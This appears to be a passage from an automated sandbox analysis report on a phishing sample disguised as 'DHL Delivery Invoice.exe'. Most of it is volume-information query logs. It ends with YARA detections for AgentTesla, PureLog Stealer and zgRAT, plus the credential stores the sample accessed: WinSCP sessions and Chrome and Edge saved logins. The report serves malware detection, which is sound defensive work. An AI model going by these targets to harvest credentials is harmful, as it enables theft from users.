                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.DataSetExtensions\v4.0_4.0.0.0__b77a5c561934e089\System.Data.DataSetExtensions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Users\user\Desktop\DHL Delivery Invoice.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeQueries volume information: C:\Users\user\AppData\Roaming\LIWBHGsz.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.DataSetExtensions\v4.0_4.0.0.0__b77a5c561934e089\System.Data.DataSetExtensions.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeQueries volume information: C:\Users\user\AppData\Roaming\LIWBHGsz.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Yara detected AgentTesla
                      Source: Yara matchFile source: 10.2.LIWBHGsz.exe.4909990.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.LIWBHGsz.exe.4909990.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.LIWBHGsz.exe.4b6ace8.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.LIWBHGsz.exe.4b6ace8.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.DHL Delivery Invoice.exe.45f9b08.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.DHL Delivery Invoice.exe.457ace8.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.DHL Delivery Invoice.exe.4355848.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000A.00000002.1880257030.0000000004908000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.4259345206.0000000002811000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.1880257030.0000000004B6A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.4259229208.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1828601395.0000000004355000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: DHL Delivery Invoice.exe PID: 6724, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: DHL Delivery Invoice.exe PID: 2032, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: LIWBHGsz.exe PID: 2852, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: LIWBHGsz.exe PID: 7436, type: MEMORYSTR
                      Yara detected PureLog Stealer
                      Source: Yara matchFile source: 0.2.DHL Delivery Invoice.exe.4335828.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.DHL Delivery Invoice.exe.79a0000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.DHL Delivery Invoice.exe.4355848.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.DHL Delivery Invoice.exe.79a0000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.DHL Delivery Invoice.exe.4335828.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.DHL Delivery Invoice.exe.4355848.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1843513866.00000000079A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1828601395.0000000004318000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1828601395.0000000004355000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Yara detected zgRAT
                      Source: Yara matchFile source: 0.2.DHL Delivery Invoice.exe.4355848.2.raw.unpack, type: UNPACKEDPE
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
